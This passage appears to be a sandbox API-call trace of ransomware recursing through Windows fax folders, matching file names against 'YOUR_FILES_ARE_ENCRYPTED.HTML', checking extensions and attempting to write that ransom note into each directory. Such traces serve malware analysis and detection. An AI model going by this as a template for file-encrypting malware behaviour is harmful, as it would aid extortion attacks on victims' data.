lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf6ae685, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf6ae685, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf6b4b01, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6363f0, dwReserved1=0x63c420, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.403] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf6ae685, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf6ae685, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf6b4b01, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6363f0, dwReserved1=0x63c420, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.403] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0110.403] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\ActivityLog\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 91 [0110.403] GetProcessHeap () returned 0x600000 [0110.403] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.403] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\ActivityLog\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\activitylog\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.404] GetProcessHeap () returned 0x600000 [0110.404] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.404] GetProcessHeap () returned 0x600000 [0110.404] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0110.404] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd313219, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd313219, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c470, dwReserved1=0x63c418, cFileName="Common Coverpages", cAlternateFileName="COMMON~1")) returned 1 [0110.404] StrStrIW (lpFirst="Common Coverpages", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.404] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages") returned 67 [0110.404] GetProcessHeap () returned 0x600000 [0110.404] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0110.405] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages" [0110.405] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\*" [0110.405] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd313219, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xaf6c9393, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0x63c420, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0110.406] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd313219, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xaf6c9393, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0x63c420, cFileName="..", cAlternateFileName="")) returned 1 [0110.406] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd313219, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd313219, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd313219, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0x63c420, cFileName="en-US", cAlternateFileName="")) returned 1 [0110.406] StrStrIW (lpFirst="en-US", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.406] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US") returned 73 [0110.406] GetProcessHeap () returned 0x600000 [0110.406] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0110.407] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US" [0110.407] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\*" [0110.407] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd313219, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd313219, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xaf6c1f11, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ee28, dwReserved1=0x62eda0, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0110.407] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd313219, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd313219, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xaf6c1f11, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ee28, dwReserved1=0x62eda0, cFileName="..", cAlternateFileName="")) returned 1 [0110.407] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa476ffa8, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xa476ffa8, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xa476ffa8, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x28aa, dwReserved0=0x62ee28, dwReserved1=0x62eda0, cFileName="confident.cov", cAlternateFileName="")) returned 1 [0110.407] StrStrIW (lpFirst="confident.cov", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.407] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\confident.cov") returned 87 [0110.407] PathFindExtensionW (pszPath="confident.cov") returned=".cov" [0110.407] lstrlenW (lpString=".cov") returned 4 [0110.407] PathFindExtensionW (pszPath="confident.cov") returned=".cov" [0110.407] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4796233, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xa4796233, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xa4796233, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x2a09, dwReserved0=0x62ee28, dwReserved1=0x62eda0, cFileName="fyi.cov", cAlternateFileName="")) returned 1 [0110.407] StrStrIW (lpFirst="fyi.cov", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.407] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\fyi.cov") returned 81 [0110.407] PathFindExtensionW (pszPath="fyi.cov") returned=".cov" [0110.407] lstrlenW (lpString=".cov") returned 4 [0110.407] PathFindExtensionW (pszPath="fyi.cov") returned=".cov" [0110.407] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa476ffa8, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xa476ffa8, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xa476ffa8, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x3aa0, dwReserved0=0x62ee28, dwReserved1=0x62eda0, cFileName="generic.cov", cAlternateFileName="")) returned 1 [0110.407] StrStrIW (lpFirst="generic.cov", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.407] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\generic.cov") returned 85 [0110.407] PathFindExtensionW (pszPath="generic.cov") returned=".cov" [0110.407] lstrlenW (lpString=".cov") returned 4 [0110.407] PathFindExtensionW (pszPath="generic.cov") returned=".cov" [0110.407] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4796233, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xa4796233, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xa4796233, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x2886, dwReserved0=0x62ee28, dwReserved1=0x62eda0, cFileName="urgent.cov", cAlternateFileName="")) returned 1 [0110.407] StrStrIW (lpFirst="urgent.cov", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.407] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\urgent.cov") returned 84 [0110.407] PathFindExtensionW (pszPath="urgent.cov") returned=".cov" [0110.408] lstrlenW (lpString=".cov") returned 4 [0110.408] PathFindExtensionW (pszPath="urgent.cov") returned=".cov" [0110.408] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf6c1f11, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf6c1f11, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf6c6c76, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x62ee28, dwReserved1=0x62eda0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.408] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf6c1f11, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf6c1f11, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf6c6c76, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x62ee28, dwReserved1=0x62eda0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.408] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0110.408] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 103 [0110.408] GetProcessHeap () returned 0x600000 [0110.408] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3184de8 [0110.408] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\common coverpages\\en-us\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.408] GetProcessHeap () returned 0x600000 [0110.408] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3184de8 | out: hHeap=0x600000) returned 1 [0110.408] GetProcessHeap () returned 0x600000 [0110.408] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0110.409] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf6c9393, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf6c9393, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf6ce1d6, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6363f0, dwReserved1=0x63c420, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.409] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf6c9393, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf6c9393, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf6ce1d6, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6363f0, dwReserved1=0x63c420, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.409] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0110.409] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 97 [0110.409] GetProcessHeap () returned 0x600000 [0110.409] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.409] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\common coverpages\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.409] GetProcessHeap () returned 0x600000 [0110.409] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.409] GetProcessHeap () returned 0x600000 [0110.409] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0110.410] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c470, dwReserved1=0x63c418, cFileName="Inbox", cAlternateFileName="")) returned 1 [0110.410] StrStrIW (lpFirst="Inbox", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.411] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Inbox") returned 55 [0110.411] GetProcessHeap () returned 0x600000 [0110.411] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0110.411] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Inbox" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Inbox") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Inbox" [0110.412] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Inbox", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Inbox\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Inbox\\*" [0110.412] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Inbox\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xaf80081f, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0x63c420, cFileName=".", cAlternateFileName="")) returned 0x6268b8 [0110.412] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xaf80081f, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0x63c420, cFileName="..", cAlternateFileName="")) returned 1 [0110.412] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf7ff4b2, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf7ff4b2, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf80562b, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6363f0, dwReserved1=0x63c420, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.412] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf7ff4b2, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf7ff4b2, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf80562b, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6363f0, dwReserved1=0x63c420, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.412] FindClose (in: hFindFile=0x6268b8 | out: hFindFile=0x6268b8) returned 1 [0110.412] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Inbox\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 85 [0110.412] GetProcessHeap () returned 0x600000 [0110.412] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.412] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Inbox\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\inbox\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.412] GetProcessHeap () returned 0x600000 [0110.413] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.413] GetProcessHeap () returned 0x600000 [0110.413] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0110.413] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c470, dwReserved1=0x63c418, cFileName="Queue", cAlternateFileName="")) returned 1 [0110.413] StrStrIW (lpFirst="Queue", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.413] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Queue") returned 55 [0110.413] GetProcessHeap () returned 0x600000 [0110.413] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0110.414] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Queue" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Queue") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Queue" [0110.414] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Queue", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Queue\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Queue\\*" [0110.414] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Queue\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xaf810632, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0x63c420, cFileName=".", cAlternateFileName="")) returned 0x626738 [0110.415] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xaf810632, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0x63c420, cFileName="..", cAlternateFileName="")) returned 1 [0110.415] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf810632, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf810632, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf81547f, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6363f0, dwReserved1=0x63c420, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.415] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf810632, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf810632, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf81547f, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, 